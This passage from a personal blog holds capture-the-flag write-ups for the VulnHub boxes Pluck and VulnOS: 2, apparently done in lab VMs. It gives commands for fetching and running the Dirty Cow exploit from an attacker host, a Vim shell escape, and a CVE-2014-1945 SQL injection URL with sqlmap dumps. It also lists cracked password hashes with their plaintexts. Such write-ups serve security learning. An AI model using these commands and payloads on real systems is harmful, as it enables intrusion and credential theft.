You could sed out the RSA key ( <span style="color: lime;">sed '0,/BEGIN RSA PRIVATE KEY/d;/END RSA PRIVATE KEY/,$d' backup.tar</span> ) and add the BEGIN and END strings, or just be lazy and Select, Copy and Paste..<br />
<br />
I named the file deployment-key.txt and edited permissions to 600;<br />
<span style="color: lime;">chmod 600 deployment-key.txt</span><br />
<br />
Then tried to log in ssh yet again, but now as user paul with an ssh-rsa key;<br />
<span style="color: lime;">ssh -i deployment-key.txt paul@192.168.110.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_pdm_1_zpsxottjfij.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="484" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_pdm_1_zpsxottjfij.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, well this is different.. well I guess the passwd file did mention /usr/bin/pdmenu for user paul..<br />
<br /></div>
After messing around a bit with telnet and WWW I tried the edit file part remembering a trick a pal had once shown, gaining access by simply adding a user to the passwd file.<br />
<br />
So decided to try and open up the /etc/passwd file<br />
<br />
oh fuck.. Vim.. I seriously need to learn to use this.. how many times I have gotten stuck in it and have had to google how to just friggin exit the editor is just downright embarrassing.<br />
<br />
So after spending a bit of time on trying to edit the file to get it to open and be able to break out into shell, I noticed that the file was, of course, read-only [facepalm]..<br />
<br />
The breaking out of Vim is well-documented and a quick google session later I found the hidden gold I needed;<br />
<a href="https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells" target="_blank">https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells</a><br />
<br />
In Vim command mode;<br />
<span style="color: lime;">:set shell=/bin/bash</span><br />
<span style="color: lime;">:shell</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim_zpsc7n5xokk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="552" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim_zpsc7n5xokk.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Bingo! shell!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim-escape_zpsdxpxdfhf.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim-escape_zpsdxpxdfhf.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A bit of googling showed I could probably try out an easy way to root and use the dirty cow exploit.<br />
<br />
I hosted the Dirty Cow exploit 40616.c on my attacking system and changed to the writeable /tmp directory on Pluck to wget the exploit to the target.<br />
Then following the instructions in the exploit I compiled it with gcc.<br />
<br />
<span style="color: lime;">wget 192.168.110.101/40616.c</span><br />
<span style="color: lime;">gcc -o cow 40616.c -pthread</span><br />
It compiled with some warnings, but fingers crossed..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_gcc_zpswfywscvn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="528" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_gcc_zpswfywscvn.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I chmod-ed the file to make it executable, and ran it..<br />
<span style="color: lime;">chmod +x cow</span><br />
<span style="color: lime;">./cow</span><br />
<br />
Fuck Yeah..!<br />
rootdance!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/girl-dancing-excited_zpshdy9aldv.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/girl-dancing-excited_zpshdy9aldv.gif" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
I immediately ran the command to make the exploit more stable and avoid freezes on the target system (without this step, the target system froze pretty quick for me);<br />
<span style="color: lime;">echo 0 > /proc/sys/vm/dirty_writeback_centisecs</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_cow_zpsrowyvd55.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="256" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_cow_zpsrowyvd55.png" width="640" /></a><br />
<br />
<br />
Checked out the /root dir;<br />
<span style="color: lime;">ls /root</span><br />
<span style="color: lime;">cat /root/flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_flag_zpsjazm92vz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="498" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_flag_zpsjazm92vz.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Big thanks to the creator and to VulnHub for hosting these awesome challenges :D<br />
<br />
<br />
<br />
<br />
<div style="text-align: left;">
</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>Happy & Content :)</b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://media.licdn.com/mpr/mpr/p/7/005/04a/3f0/1c58170.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://media.licdn.com/mpr/mpr/p/7/005/04a/3f0/1c58170.jpg" width="320" /></a></div>
<br />
<br />
<br />
<b><u>Tools used; </u></b><br />
<br />
HOST DICOVERY<br />
- netdiscover<br />
- arp-scan<br />
<br />
PORT SCANNING<br />
- nmap<br />
<br />
FORCED BROWSING<br />
- dirb<br />
- dirbuster<br />
- wfuzz<br />
<br />
VULNERABILITY CHECKS / SCANNING<br />
- nikto<br />
- searchsploit<br />
<br />
FILE TRANSFER<br />
- wget<br />
- curl<br />
<br />
<br />
Speshull thanx to guugl :P<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8356530514965708840.post-35160511923441497962016-05-20T17:34:00.000+02:002016-06-06T19:09:21.111+02:00VulnHub -- VulnOS: 2 -- Writeup<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b>Cracking VulnOS: 2</b><br />
<b>================</b><br />
So trying my hand at another VulnHub VM.. after having failed miserably at Gibson, which was awesomely <a href="http://ch3rn0byl.com/gibson-walkthrough/" target="_blank">busted </a>by <a href="http://forum.top-hat-sec.com/index.php" target="_blank">THS </a>bud ch3rn0byl, I was hoping for an easy 'pick-me-up' ..<br />
Yah.. didn't happen..<br />
<br />
The more I think I know, the more I realise I don't.. sometimes annoying, but mostly fueling the fire :D *roar!*<br />
<br />
<b><span style="color: yellow;">Getting target(s)</span></b><br />
<b><span style="color: yellow;">=============</span></b><br />
<span style="color: lime;">netdiscover -i eth0 -P -r 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ranger-01_zpsn1qoi4or.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ranger-01_zpsn1qoi4or.png" height="240" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And then the obligatory nmap;<br />
<span style="color: lime;">nmap -T4 -A 192.168.56.104</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/zenmap-01_zpsu1zdnjnh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/zenmap-01_zpsu1zdnjnh.png" height="574" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
Open up the webpage to see a link to the company's webserver;<br />
<b>/jabc</b><br />
<br />
After a bit of browsing and learning about <a href="https://en.wikipedia.org/wiki/Lorem_ipsum" target="_blank">text fillers</a> (grrrrr...) found a link to the 'documentation' ;<br />
<b>/jabcd0cs/</b> cunningly obscured with same colour as background..sneaky..<br />
We are advised we can log in as guest with <b>guest/guest</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/browser-01_zpsa3njaqgy.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/browser-01_zpsa3njaqgy.png" height="372" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright, this looks promising, a document management system called OpenDocMan, logging in as guest and looking around, we see it allows uploads, sweet lets give it a shot !!<br />
<br />
Lets try uploading a php reverse shell to see if we can get lucky!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-02_zpsvkyodde9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-02_zpsvkyodde9.png" height="165" width="400" /></a></div>
<br />
<br />
<br />
<br />
<i>Booo... can't upload shells</i><br />
<br />
<br />
<br />
<br />
<br />
hmm.. OK, so it is limited, but it also shows that admin can edit the file list.. OK, target acquired..<br />
<br />
<br />
<b><span style="color: yellow;">I can has admin ?</span></b><br />
<b><span style="color: yellow;">=============</span></b><br />
The version is nicely printed at the bottom of the screen, so we do a searchsploit to see if any possible vulnerabilities.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-01_zpsftuxegqo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-01_zpsftuxegqo.png" height="140" width="320" /></a></div>
<br />
<br />
<br />
<i>Nice and clear version info</i><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: lime;">searchsploit opendocman 1.2.7</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-01_zpshsw0a3kt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-01_zpshsw0a3kt.png" height="130" width="400" /></a></div>
<br />
<br />
<br />
<i>Ooohh... Multiple..</i><br />
<br />
<br />
<br />
<br />
<span style="color: lime;">cat /usr/share/exploitdb/platforms/php/webapps/32075.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-02_zpsqw8diwdn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-02_zpsqw8diwdn.png" height="403" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright, an sqli vulnerability as well as an exploit to get admin access/rights on the opendocman system.<br />
Guest does not have admin privs and I want to try to upload a reverse shell and need admin privs to do that, so decide to try to get admin privs.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-01_zpsg4ox3enk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-01_zpsg4ox3enk.png" height="320" width="240" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>no admin privs :(</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I copy the form information and create an html file accordingly, edit to reflect guest's user ID, upload with my guest account, view it, click on "Run".. and check guest's credentials again..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-01_zpsiorzlkpd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-01_zpsiorzlkpd.png" height="98" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-upload-01_zps1i8hviuq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-upload-01_zps1i8hviuq.png" height="337" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-02_zpsikswy7nw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-02_zpsikswy7nw.png" height="111" width="400" /></a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-02_zpsgb5ii0in.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-02_zpsgb5ii0in.png" height="400" width="322" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>Game on! admin privs..</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
But wait... still can't alter allowed filetypes.. Booo..<br />
<br />
Putting my thinking cap back on; despite other accounts being admin, maybe the only admin user allowed access is user #1 ?<br />
I go to update users, find webmin account and update password to 12345.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-03_zpshmjytakg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-03_zpshmjytakg.png" height="400" width="318" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>Awesome, admin privs allow guest to edit another user's password</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Then see whether I can now log in as webmin with better access control.<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/admin-panel-01_zpsbdwuogd5.png" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/admin-panel-01_zpsbdwuogd5.png" height="292" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>FuckYeah... I has full admin..</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><span style="color: yellow;">Teh Failz</span></b><br />
<b><span style="color: yellow;">=======</span></b><br />
So now when heading over to the admin panel I see I can alter the allowed filetypes, lets get php up in there and try to get a reverse shell going..<br />
Hmm uploads fine, but it <b>won't</b> execute..<br />
<br />
OK, just for shits and giggles, lets see if imagemagick is used in any way allowing an ImageTragick attach when uploading a malicious png..<br />
<b>Nope</b>..image is not displayed. Bah.<br />
<br />
OK, well since the webform worked OK, how about some java ?<br />
I make a test html file with some simple java, upload it and view it, well that worked OK,<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/javatest-01_zpsrferhjyx.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/javatest-01_zpsrferhjyx.png" height="195" width="400" /></a></div>
<br />
<br />
<br />
<br />
<i>This test works, but failed to weaponize it :(</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
how about trying to make a java reverse shell ?<br />
<br />
This is where I spent way to much time messing about, I tried to somehow weaponize the java but simply lack the skills needed for this.<br />
I had found what was reportedly a java reverse shell, but failed miserably in trying to get this to run from within the html.<br />
<i>(Any pointers from teh pr0z on what I could have done greatly appreciated!)</i><br />
<br />
So after a while (ok, a fu*kin long time) decided that this is probably not going to be the way in, after googling my arse off I could find no reference in leveraging uploaded files in opendocman to get shell, so it was time to move on..<br />
<br />
What a waste of time..pfff, oh well I'm sure (or rather hopeful.. lol) I learned something..<br />
<br />
<br />
<b><span style="color: yellow;">Getting a foot in the door - SQLi</span></b><br />
<b><span style="color: yellow;">=========================</span></b><br />
So the 1st item in the list of opendocman exploits was an SQLi vulnerability;<br />
<br />
1) SQL Injection in OpenDocMan: CVE-2014-1945<br />
<i>The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.</i><br />
The exploitation example below displays version of the MySQL server:<br />
<i>http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9</i><br />
<div>
<br /></div>
Alright, lets do some quick checks..<br />
The exploit example makes use of the <b>'add_value=odm_user'</b> parameter for an sql injection attack so let's see what information can be found with sqlmap;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user'</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-01_zpsxljpasrk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-01_zpsxljpasrk.png" height="320" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright, that seems to show a positive return..<br />
<br />
Now to check out which databases we can see;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --dbs</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-02_zps0xkxo6ri.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-02_zps0xkxo6ri.png" height="252" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Then check out the tables of the jabcd0cs database;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs --tables</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-03_zpsrs0kwndw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-03_zpsrs0kwndw.png" height="323" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And then check what can be found in the odm_user table ;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs -T odm_user --columns</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-04_zpsx0s2d4sm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-04_zpsx0s2d4sm.png" height="288" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
ooohhhhhh.. username AND password.. that' ll do me just fine..<br />
let's dump it !<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs -T odm_user --dump</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-05_zpslym83puh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-05_zpslym83puh.png" height="179" width="640" /></a></div>
<br />
<br />
<i>yay hashes..</i><br />
<br />
<br />
<b><span style="color: yellow;">Gaining Access</span></b><br />
<b><span style="color: yellow;">============</span></b><br />
OK, so what are these password hashes<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/hashid-01_zpsdgzgvhnz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/hashid-01_zpsdgzgvhnz.png" height="231" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<i>Cool, MD5</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
For MD5, there are great online crackers which are truly hard to beat..<br />
Sure you can do it hardcore yourself, but there are so many hashes already online and cracked, that sometimes a simple google search will actually already turn up the answer.<br />
In this case google doesn't.. so onto <a href="http://md5cracker.org/">MD5cracker.org</a> ..<br />
<i>(Thanks H4v0K for the hint on that site, I had tried others with no success!)</i><br />
<br />
success!<br />
<blockquote class="tr_bq">
<span style="color: #999999;">084e0343a0486ff05530df6c705c8bb4:guest<br />b78aae356709f8c31118ea613980954b:webmin1980</span></blockquote>
Sooooo can we use these passwords to log in ?<br />
<br />
I try to log into ssh with guest | guest ;<br />
<span style="color: lime;">ssh guest@192.168.56.104</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-02_zpsswq6zmds.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-02_zpsswq6zmds.png" height="103" width="400" /></a></div>
<br />
<br />
<i>failed with password 'guest' :(</i><br />
<br />
<br />
<br />
<br />
trying with webmin | webmin1980;<br />
<span style="color: lime;">ssh webmin@192.168.56.104</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-01_zpscha9j183.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-01_zpscha9j183.png" height="188" width="400" /></a></div>
<br />
<br />
<br />
<br />
<i>whaaa ! I'm in !</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
First thing that catches my eye is the Ubuntu 14.04.04 LTS<br />
This I have seen before and have used a local exploit on with success using one of the ofs exploits..<br />
Anyway I have a quick browse around but find nothing of interest.<br />
<br />
So lets spawn a terminal, find a writeable directory and try a couple of the good 'ol ofs exploits;<br />
<span style="color: lime;">python -c 'import pty; pty.spawn("/bin/bash")'</span><br />
<div>
<br /></div>
<div>
I precompiled the exploit-db ofs exploits 37292 & 39166 and have them sitting in my exploitz directory along with the ofs exploits from kernel-exploits.com.</div>
No success with the compiled exploit_db exploits, however I have learned that one should try them all !<br />
So I uploaded the trusty ofs_32 from kernel-exploits.com and gave that one a whirl..<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/root-02_zpssvmh4ben.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/root-02_zpssvmh4ben.png" height="185" width="400" /></a></div>
<br />
<br />
<br />
<br />
<i>fuckyeah</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>After reading the writeup by the author, (found here <a href="https://github.com/d4rc0d3x/ctfs/blob/master/writeups/vulnhub/VulnOSv2/README.md" target="_blank">https://github.com/d4rc0d3x/ctfs/blob/master/writeups/vulnhub/VulnOSv2/README.md</a>)</i><br />
<i>I noted that he did use the 37292.c exploit by compiling it on the actual victim.. n00b as I am I thought that using precompiled would be easier.. now I know that its also possible (better?) to compile on victim..</i><br />
<i>But as a trusty THS member asked me the other day; has the pre-compiled exploit from kernel-exploits.com failed where the exploit-db ones have succeeded.. Not sure but think not..</i><br />
<i>Still, valuable lesson learned.</i><br />
<br />
<br />
<b><span style="color: yellow;">TIFU</span></b><br />
<b><span style="color: yellow;">=====</span></b><br />
Now.. this is where it gets embarassing... In the past couple of VMs I have done where root was the goal, flags were often found in the /root directory.. so I have no idea why I first decided it would be a good idea to check the /home/vulnosadmin directory.. but I did..<br />
<br />
and found the file r00t.blend<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/blend-01_zpszqa45svq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/blend-01_zpszqa45svq.png" height="320" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
My first reaction was; this is it, this is an extra step to the flag,..<br />
But what is r00t.blend..<br />
<span style="color: lime;">file r00t.blend</span><br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-01_zpsgnr0kelj.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-01_zpsgnr0kelj.png" height="83" width="400" /></a></div>
<br /></div>
<i>it's a Blender3d file</i><br />
<i>OK, wtf is that..</i><br />
<br />
<br />
<br />
> Googled<br />
> Downloaded blender<br />
> opened the file<br />
dafuq..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-01_zps0qafrvvu.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-01_zps0qafrvvu.jpg" height="342" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
> got a tantalising glimpse of what appeared to be a sequence of letters when slightly moving the cube<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-02_zpsgfhtcyo1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-02_zpsgfhtcyo1.jpg" height="342" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
> spent 15 minutes watching youtube videos on how the hell this proggy is supposed to work when using a touchpad..<br />
<br />
> With some keyboard mashing and some vague touchpad movements was able to get this beauty..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-03_zpsot3f5m1d.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-03_zpsot3f5m1d.jpg" height="292" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<i>Uhh, OK.. </i><br />
<i>Doesnt read much like a flag.. is it a password for another file ?</i><br />
<br />
<br />
<br />
<br />
<br />
